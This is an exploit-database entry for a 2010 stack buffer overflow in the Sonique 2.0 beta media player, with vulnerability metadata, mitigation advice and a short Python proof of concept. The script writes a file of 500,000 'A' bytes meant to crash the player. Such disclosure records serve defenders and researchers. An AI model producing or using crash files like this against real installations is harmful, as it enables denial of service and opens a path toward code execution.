header-logo
Suggest Exploit
vendor:
Sonique
by:
Hamza_hack_dz & Black-liondz1
7.5
CVSS
HIGH
Remote stack-based buffer-overflow
CWE
Product Name: Sonique
Affected Version From: Sonique 2.0 Beta Build 103
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:sonique:sonique:2.0_beta_build_103
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2010

Remote Stack-based Buffer Overflow in Sonique

The Sonique application is prone to a remote stack-based buffer-overflow vulnerability. This vulnerability occurs due to the application's failure to perform adequate boundary checks on user-supplied input. Attackers can leverage this issue to execute arbitrary code in the context of the application, potentially leading to denial-of-service conditions in failed attacks.

Mitigation:

Apply the latest patch or update from the vendor to address this vulnerability. Additionally, exercise caution when opening files from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42434/info

Sonique is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Sonique 2.0 Beta Build 103 is vulnerable; other versions may also be affected. 

#Date: 12/8/2010                                                                            
#Author:Hamza_hack_dz & Black-liondz1                                                      
#Software Link:Download: http://www.softpedia.com/progDownload/Sonique-2-Download-6707.html #                                                                          #
#Version:sonique2                                                                           
# web:www.sa-hacker.com/vb
# Email:hamza_hack_dz@hotmail.com &b-l@ho9mail.com                                           

                        
#!/user/bin/python

filename = "sa-hacker.xpl"

junk = "\x41" * 500000

exploit = junk

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()


# Inj3ct0r.com [2010-08-12]